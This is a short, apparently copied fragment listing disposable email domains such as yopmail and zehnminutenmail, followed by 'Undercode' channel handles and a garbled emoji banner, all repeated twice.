yopmail.fr
yopmail.net
ypmail.webarnak.fr.eu.org
yuurok.com
zehnminutenmail.de
zippymail.info
zoaxe.com
zoemail.org
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
yopmail.com
yopmail.fr
yopmail.net
ypmail.webarnak.fr.eu.org
yuurok.com
zehnminutenmail.de
zippymail.info
zoaxe.com
zoemail.org
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β